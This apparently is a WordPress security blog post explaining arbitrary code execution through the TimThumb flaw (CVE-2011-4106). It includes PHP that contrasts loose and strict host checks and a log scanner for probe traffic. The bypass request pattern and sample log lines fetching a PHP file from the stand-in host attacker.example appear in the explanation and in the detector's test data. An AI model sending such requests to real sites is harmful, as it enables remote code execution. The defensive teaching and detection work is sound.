What is 🔥 Arbitrary code execution and How to protect WordPress from ARE attacks

Arbitrary Code Execution is a process that enables an attacker to execute arbitrary code on a WordPress website.

Hackers often break into a website by exploiting outdated plugins, themes, and even the WordPress core. They then upload a PHP file containing malicious code.

They then run that code to navigate and inspect your files and look for ways to gain complete control of your website. With that control they can erase files, steal sensitive information and sell it on the black market, and use your website’s resources to send spam emails and attack other websites.


Exploits that allow arbitrary code execution can be devastating to your WordPress website and potentially harm you in the following ways:

Once hackers have gained access to your website, they use arbitrary code to explore and examine your files, looking for ways to obtain complete control of your WordPress website or hosting account.

Hackers can change or destroy information, as well as steal and sell critical data on the black market, jeopardizing users’ privacy and integrity.

They can use your site’s resources to launch attacks or send spam emails to other websites, which can, in a domino-like effect, have the following consequences:

  • SEO ranking can decrease and Google might even blacklist your website
  • The site traffic might plummet and revenue will take a hit
  • Web hosting provider may suspend your account for malicious activities

Recovering from such hacks is expensive and tedious, and for many, next to impossible.


🔴 CVE-2011-4106 – One of the most famous ARE attacks in the WordPress ecosystem during 2011-2014 was the exploitation of TimThumb, a simple PHP script used for resizing images.

TimThumb’s main feature was to build thumbnails of images hosted on trustworthy third-party websites by downloading them and storing them in a cache directory.

This feature worked using a simple GET request:

timthumb.php?src=http://trusted-site.tld/image.gif

The script checked whether the GET request pointed at a trusted source, e.g. domains that start with blogger.com or wordpress.com, but the check only looked at how the host name began, so it could be tricked with a look-alike domain such as blogger.wpxss.com:

timthumb.php?src=http://trusted-site.XXXXX.tld/image.gif

That way, hackers bypassed the trusted-site check and, with a single GET request, downloaded and executed arbitrary code on the target website.
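To make the flaw concrete, here is an added PHP illustration (not TimThumb’s real source, and not code from this post) of a loose “trusted host” check of the kind described above, next to a hardened version of the same check. The allowlist, the sample URLs and the attacker.example host are constructed for the example.

```php
<?php
// Added example, not TimThumb's real code: a loose "trusted host" check
// of the kind the post describes, next to a hardened version of it.

// Constructed allowlist for the example (the post names these two domains).
const TRUSTED_HOSTS = ['blogger.com', 'wordpress.com'];

// Loose check: the trusted name only has to appear somewhere in the host,
// so a look-alike host that merely contains it is accepted as well.
function is_trusted_loose(string $src): bool
{
    $host = parse_url($src, PHP_URL_HOST);
    if (!is_string($host)) {
        return false;
    }
    foreach (TRUSTED_HOSTS as $trusted) {
        if (strpos($host, $trusted) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened check: parse the URL, require an http(s) scheme, normalise the
// host, and accept it only if it IS a trusted domain or a subdomain of one.
function is_trusted_strict(string $src): bool
{
    $parts = parse_url($src);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach (TRUSTED_HOSTS as $trusted) {
        $suffix = '.' . $trusted;
        if ($host === $trusted || substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed sample URLs: two genuinely trusted hosts (one in mixed case)
// and one look-alike host; attacker.example is a placeholder, not a real site.
$samples = [
    'http://blogger.com/image.gif',
    'HTTP://Img.WordPress.COM/image.gif',
    'http://blogger.com.attacker.example/image.gif',
];

foreach ($samples as $src) {
    printf("%-48s loose=%s strict=%s\n",
        $src,
        is_trusted_loose($src) ? 'allow' : 'deny',
        is_trusted_strict($src) ? 'allow' : 'deny');
}
```

The look-alike host is accepted by the loose check and rejected by the strict one, while the mixed-case trusted host is only accepted once the host is normalised. A host allowlist is still only the first gate: whatever is fetched should additionally be verified to be an image (for example with getimagesize()) and written to the cache under a fixed, non-executable file name, so that a fetched PHP file can never be served as a script.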

Even today, a decade later, we can still see bots sending GET requests to timthumb.php and thumb.php files on WordPress websites, attempting to exploit this old vulnerability.
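Those probes are easy to spot in a web server’s access log. The following added PHP example (not from this post) scans combined-format log lines and flags any request to timthumb.php or thumb.php whose src= parameter points at a remote host, which is the pattern of the bot traffic described above. The log lines, IP addresses and host names are constructed placeholders.

```php
<?php
// Added example (not from the post): flag access-log requests that probe
// timthumb.php / thumb.php with a remote src= parameter.

// Constructed sample log lines in combined format; addresses are placeholders.
$sampleLog = <<<'LOG'
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /wp-content/themes/demo/timthumb.php?src=http://blogger.com.attacker.example/x.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /wp-content/plugins/demo/thumb.php?src=http%3A%2F%2Fattacker.example%2Fx.php HTTP/1.1" 404 0 "-" "curl/8.0"
198.51.100.7 - - [10/May/2024:12:00:03 +0000] "GET /wp-content/themes/demo/timthumb.php?src=/wp-content/uploads/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2024:12:00:04 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
LOG;

// Script names the post says bots still request.
const PROBE_SCRIPTS = ['timthumb.php', 'thumb.php'];

// Parse one combined-format line into the fields we need; null if it does not match.
function parse_log_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int) $m[5]];
}

// Return a finding for a request that hits a known thumbnail script with a
// src= pointing at another host; null for anything else (including a local src).
function classify_request(array $req): ?array
{
    $path = parse_url($req['target'], PHP_URL_PATH);
    if (!is_string($path) || !in_array(strtolower(basename($path)), PROBE_SCRIPTS, true)) {
        return null;
    }
    $query = parse_url($req['target'], PHP_URL_QUERY);
    parse_str(is_string($query) ? $query : '', $params); // parse_str also URL-decodes
    $srcHost = parse_url($params['src'] ?? '', PHP_URL_HOST);
    if (!is_string($srcHost)) {
        return null; // relative/local src: ordinary thumbnail use
    }
    return ['ip' => $req['ip'], 'time' => $req['time'], 'script' => basename($path),
            'src_host' => $srcHost, 'status' => $req['status']];
}

// Scan a whole log text and collect the findings.
function scan_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parse_log_line($line);
        if ($req !== null && ($finding = classify_request($req)) !== null) {
            $findings[] = $finding;
        }
    }
    return $findings;
}

foreach (scan_log($sampleLog) as $f) {
    printf("[%s] %s -> %s src host %s (HTTP %d)\n",
        $f['time'], $f['ip'], $f['script'], $f['src_host'], $f['status']);
}
```

On the sample input only the first two lines are reported; the third is a legitimate local thumbnail request and the fourth does not touch a thumbnail script at all. The HTTP status is kept in each finding because a 200 on such a request is the case worth investigating first: it means a copy of the script is actually present on the site.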


Arbitrary code execution vulnerabilities in WordPress are difficult to identify manually, so I suggest scanning your website for known ARE vulnerabilities with a plugin like MalCare.


short answer: update

When developers discover security problems in their plugins and themes, they know the flaw might be used to execute arbitrary code on a WordPress site, so they issue security updates to address it.

If you don’t update, you’re leaving the door open for hackers to target your WordPress website. The bottom line is that you should never miss an update.
